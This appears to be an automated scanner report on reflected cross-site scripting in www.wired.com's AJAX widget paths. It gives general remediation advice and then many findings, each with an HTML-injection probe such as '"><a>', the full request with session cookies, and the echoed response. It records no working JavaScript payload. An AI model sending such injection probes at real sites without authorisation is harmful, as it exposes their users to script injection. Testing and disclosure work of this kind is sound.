Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e3bf"><a>5de4eb6055f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax9e3bf"><a>5de4eb6055f/widgets/related/content/blogPost/autopia_29989 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:13:57 GMT Date: Mon, 22 Nov 2010 01:10:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax9e3bf"><a>5de4eb6055f ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b57b"><a>764ea10e8d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets1b57b"><a>764ea10e8d2/related/content/blogPost/autopia_29989 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Mon, 22 Nov 2010 01:14:29 GMT Date: Mon, 22 Nov 2010 01:10:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets1b57b"><a>764ea10e8d2 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf640"><a>99098f04c4b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatedbf640"><a>99098f04c4b/content/blogPost/autopia_29989 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:05 GMT Date: Mon, 22 Nov 2010 01:11:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relatedbf640"><a>99098f04c4b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f0d1"><a>9e67eb28264 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax8f0d1"><a>9e67eb28264/widgets/related/content/blogPost/epicenter_25377 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:27 GMT Date: Mon, 22 Nov 2010 01:10:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax8f0d1"><a>9e67eb28264 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f855"><a>144ef7ca22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets4f855"><a>144ef7ca22/related/content/blogPost/epicenter_25377 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Mon, 22 Nov 2010 01:14:45 GMT Date: Mon, 22 Nov 2010 01:10:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets4f855"><a>144ef7ca22 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5558d"><a>877c7a8d468 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/related5558d"><a>877c7a8d468/content/blogPost/epicenter_25377 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:11 GMT Date: Mon, 22 Nov 2010 01:11:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_related5558d"><a>877c7a8d468"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e30b"><a>f706f81ec9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax9e30b"><a>f706f81ec9d/widgets/related/content/blogPost/epicenter_25571 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:14:06 GMT Date: Mon, 22 Nov 2010 01:10:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax9e30b"><a>f706f81ec9d ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4be84"><a>0968336159a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets4be84"><a>0968336159a/related/content/blogPost/epicenter_25571 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=232 Expires: Mon, 22 Nov 2010 01:14:44 GMT Date: Mon, 22 Nov 2010 01:10:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets4be84"><a>0968336159a c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f77cf"><a>7b2d4dc85a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatedf77cf"><a>7b2d4dc85a2/content/blogPost/epicenter_25571 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:09 GMT Date: Mon, 22 Nov 2010 01:11:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relatedf77cf"><a>7b2d4dc85a2"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe51"><a>c45b8c7122 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxbbe51"><a>c45b8c7122/widgets/related/content/blogPost/magazine_39648 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29388 Vary: Accept-Encoding Cache-Control: max-age=232 Expires: Mon, 22 Nov 2010 01:14:22 GMT Date: Mon, 22 Nov 2010 01:10:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxbbe51"><a>c45b8c7122 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 934e2"><a>e80de08ba2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets934e2"><a>e80de08ba2a/related/content/blogPost/magazine_39648 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29390 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:55 GMT Date: Mon, 22 Nov 2010 01:10:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets934e2"><a>e80de08ba2a c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c6a5"><a>1a9008494ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/related6c6a5"><a>1a9008494ce/content/blogPost/magazine_39648 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29390 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:13 GMT Date: Mon, 22 Nov 2010 01:11:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_related6c6a5"><a>1a9008494ce"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc70a"><a>3b04f1e36da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxfc70a"><a>3b04f1e36da/widgets/related/content/blogPost/playbook_3021 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:34 GMT Date: Mon, 22 Nov 2010 01:10:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxfc70a"><a>3b04f1e36da ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d30b"><a>fc5601b0c19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets5d30b"><a>fc5601b0c19/related/content/blogPost/playbook_3021 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=236 Expires: Mon, 22 Nov 2010 01:14:53 GMT Date: Mon, 22 Nov 2010 01:10:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets5d30b"><a>fc5601b0c19 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f817"><a>9b3c8b9b37f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/related4f817"><a>9b3c8b9b37f/content/blogPost/playbook_3021 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:15:01 GMT Date: Mon, 22 Nov 2010 01:11:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_related4f817"><a>9b3c8b9b37f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c31"><a>f807e40c9a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxb3c31"><a>f807e40c9a9/widgets/related/content/blogPost/reviews_25843 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:23 GMT Date: Mon, 22 Nov 2010 01:10:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxb3c31"><a>f807e40c9a9 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310b1"><a>8982e2d5c82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets310b1"><a>8982e2d5c82/related/content/blogPost/reviews_25843 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
